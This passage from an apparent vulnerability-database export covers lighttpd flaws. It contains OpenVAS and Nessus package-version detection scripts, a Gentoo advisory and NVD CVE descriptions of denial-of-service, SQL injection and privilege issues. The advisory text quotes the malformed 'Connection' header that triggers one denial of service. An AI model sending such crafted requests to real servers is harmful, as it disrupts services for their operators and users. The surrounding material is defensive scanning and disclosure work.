"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:20", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2019-05-10T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120553", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120553", "title": "Amazon Linux Local Check: ALAS-2013-179", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2013-179.nasl 6577 2017-07-06 13:43:46Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120553\");\n script_version(\"2019-05-10T14:24:23+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:29:28 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2019-05-10 14:24:23 +0000 (Fri, 10 May 2019)\");\n script_name(\"Amazon Linux Local Check: ALAS-2013-179\");\n script_tag(name:\"insight\", value:\"The http_request_split_value function in request.c in lighttpd before 1.4.32 allows\n remote attackers to cause a denial of service (infinite loop) via a request with a header containing an empty token,\n as demonstrated using the Connection: TE, , Keep-Alive header.\");\n script_tag(name:\"solution\", value:\"Run yum update lighttpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2013-179.html\");\n script_cve_id(\"CVE-2012-5533\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"lighttpd-mod_geoip\", rpm:\"lighttpd-mod_geoip~1.4.31~1.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd-debuginfo\", rpm:\"lighttpd-debuginfo~1.4.31~1.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd-mod_mysql_vhost\", rpm:\"lighttpd-mod_mysql_vhost~1.4.31~1.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd-fastcgi\", rpm:\"lighttpd-fastcgi~1.4.31~1.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:42", "bulletinFamily": "unix", "description": "### Background\n\nlighttpd is a lightweight high-performance web server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in lighttpd. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could create a Denial of Service condition. Futhermore, a remote attacker may be able to execute arbitrary SQL statements. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll lighttpd users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/lighttpd-1.4.35\"", "modified": "2014-06-13T00:00:00", "published": "2014-06-13T00:00:00", "id": "GLSA-201406-10", "href": "https://security.gentoo.org/glsa/201406-10", "type": "gentoo", "title": "lighttpd: Multiple vulnerabilities", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2019-05-29T18:12:26", "bulletinFamily": "NVD", "description": "The http_request_split_value function in request.c in lighttpd before 1.4.32 allows remote attackers to cause a denial of service (infinite loop) via a request with a header containing an empty token, as demonstrated using the \"Connection: TE,,Keep-Alive\" header.\nPer: http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2012_01.txt\r\n\r\n\" Affected versions\r\n-------------------\r\n\r\nOnly 1.4.31; on the other hand versions before 1.4.31 include the \"invalid read\" bug.\"", "modified": "2017-08-29T01:32:00", "id": "CVE-2012-5533", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5533", "published": "2012-11-24T20:55:00", "title": "CVE-2012-5533", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:11:25", "bulletinFamily": "NVD", "description": "Integer signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index.", "modified": "2018-11-29T14:38:00", "id": "CVE-2011-4362", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4362", "published": "2011-12-24T19:55:00", "title": "CVE-2011-4362", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:44", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.", "modified": "2016-08-23T02:07:00", "id": "CVE-2014-2323", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2323", "published": "2014-03-14T15:55:00", "title": "CVE-2014-2323", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:13:04", "bulletinFamily": "NVD", "description": "lighttpd before 1.4.33 does not check the return value of the (1) setuid, (2) setgid, or (3) setgroups functions, which might cause lighttpd to run as root if it is restarted and allows remote attackers to gain privileges, as demonstrated by multiple calls to the clone function that cause setuid to fail when the user process limit is reached.", "modified": "2016-12-08T03:03:00", "id": "CVE-2013-4559", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4559", "published": "2013-11-20T14:12:00", "title": "CVE-2013-4559", "type": "cve", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:13:04", "bulletinFamily": "NVD", "description": "Use-after-free vulnerability in lighttpd before 1.4.33 allows remote attackers to cause a denial of service (segmentation fault and crash) via unspecified vectors that trigger FAMMonitorDirectory failures.", "modified": "2016-12-08T03:03:00", "id": "CVE-2013-4560", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4560", "published": "2013-11-20T14:12:00", "title": "CVE-2013-4560", "type": "cve", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:04", "bulletinFamily": "NVD", "description": "lighttpd before 1.4.34, when SNI is enabled, configures weak SSL ciphers, which makes it easier for remote attackers to hijack sessions by inserting packets into the client-server data stream or obtain sensitive information by sniffing the network.\nPer: http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_01.txt\n\n\"All versions from 1.4.24 (first version supporting SNI) up to and including\n1.4.33.\"", "modified": "2016-12-08T03:03:00", "id": "CVE-2013-4508", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4508", "published": "2013-11-08T04:47:00", "title": "CVE-2013-4508", "type": "cve", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}], "nessus": [{"lastseen": "2019-11-01T03:00:41", "bulletinFamily": "scanner", "description": " - added cve-2013-4508.patch and\n cve-2013-4508-regression-bug729480.patch: (bnc#849059)\n When defining an ssl.cipher-list, it works for the\n ", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2014-43.NASL", "href": "https://www.tenable.com/plugins/nessus/75389", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : lighttpd (openSUSE-SU-2014:0072-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-43.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75389);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/10 11:50:02\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n script_bugtraq_id(63534, 63686, 63688);\n\n script_name(english:\"openSUSE Security Update : lighttpd (openSUSE-SU-2014:0072-1)\");\n script_summary(english:\"Check for the openSUSE-2014-43 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - added cve-2013-4508.patch and\n cve-2013-4508-regression-bug729480.patch: (bnc#849059)\n When defining an ssl.cipher-list, it works for the\n 'default' HTTPS setup ($SERVER['socket'] 443 block), but\n when you utilize SNI ($HTTP['host'] blocks within the\n $SERVER['socket'] block) the ssl.cipher-list seems to\n not inherit into the host blocks and instead will\n default to include all of the available openssl ciphers\n (except SSL v2/v3 based if those are disabled)\n\n - added cve-2013-4559.patch (bnc#850468) check success of\n setuid,setgid,setgroups\n\n - added cve-2013-4560.patch (bnc#850469) FAM: fix use\n after free\n\n - added cve-2013-4508.patch and\n cve-2013-4508-regression-bug729480.patch: (bnc#849059)\n When defining an ssl.cipher-list, it works for the\n 'default' HTTPS setup ($SERVER['socket'] 443 block), but\n when you utilize SNI ($HTTP['host'] blocks within the\n $SERVER['socket'] block) the ssl.cipher-list seems to\n not inherit into the host blocks and instead will\n default to include all of the available openssl ciphers\n (except SSL v2/v3 based if those are disabled)\n\n - added cve-2013-4559.patch (bnc#850468) check success of\n setuid,setgid,setgroups\n\n - added cve-2013-4560.patch (bnc#850469) FAM: fix use\n after free\n\n - added cve-2013-4508.patch and\n cve-2013-4508-regression-bug729480.patch: (bnc#849059)\n When defining an ssl.cipher-list, it works for the\n 'default' HTTPS setup ($SERVER['socket'] 443 block), but\n when you utilize SNI ($HTTP['host'] blocks within the\n $SERVER['socket'] block) the ssl.cipher-list seems to\n not inherit into the host blocks and instead will\n default to include all of the available openssl ciphers\n (except SSL v2/v3 based if those are disabled)\n\n - added cve-2013-4559.patch (bnc#850468) check success of\n setuid,setgid,setgroups\n\n - added cve-2013-4560.patch (bnc#850469) FAM: fix use\n after free\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=849059\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=850468\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=850469\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-01/msg00049.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_geoip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_geoip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.2|SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.2 / 12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-debugsource-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_cml-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_cml-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_geoip-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_geoip-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_magnet-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_magnet-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_mysql_vhost-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_mysql_vhost-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_rrdtool-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_rrdtool-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_trigger_b4_dl-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_webdav-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"lighttpd-mod_webdav-debuginfo-1.4.31-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-debugsource-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_cml-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_cml-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_geoip-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_geoip-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_magnet-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_magnet-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_mysql_vhost-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_mysql_vhost-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_rrdtool-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_rrdtool-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_trigger_b4_dl-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_webdav-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"lighttpd-mod_webdav-debuginfo-1.4.31-6.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-debuginfo-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-debugsource-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_cml-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_cml-debuginfo-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_geoip-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_geoip-debuginfo-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_magnet-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_magnet-debuginfo-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_mysql_vhost-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_mysql_vhost-debuginfo-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_rrdtool-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_rrdtool-debuginfo-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_trigger_b4_dl-debuginfo-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_webdav-1.4.32-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"lighttpd-mod_webdav-debuginfo-1.4.32-2.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd / lighttpd-debuginfo / lighttpd-debugsource / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:27:15", "bulletinFamily": "scanner", "description": "Enable building with PIE Latest upstream, multiple security fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/ Latest upstream, multiple\nsecurity fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2014-2495.NASL", "href": "https://www.tenable.com/plugins/nessus/72651", "published": "2014-02-24T00:00:00", "title": "Fedora 20 : lighttpd-1.4.34-3.fc20 (2014-2495)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-2495.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72651);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n script_bugtraq_id(63534, 63686, 63688);\n script_xref(name:\"FEDORA\", value:\"2014-2495\");\n\n script_name(english:\"Fedora 20 : lighttpd-1.4.34-3.fc20 (2014-2495)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Enable building with PIE Latest upstream, multiple security fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/ Latest upstream, multiple\nsecurity fixes.\n\nhttp://www.lighttpd.net/2014/1/20/1-4-34/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.lighttpd.net/2014/1/20/1-4-34/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026568\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1029666\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1029667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=879185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=955145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=994444\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128980.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a292323\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"lighttpd-1.4.34-3.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:27:15", "bulletinFamily": "scanner", "description": "Enable building with PIE Latest upstream, multiple security 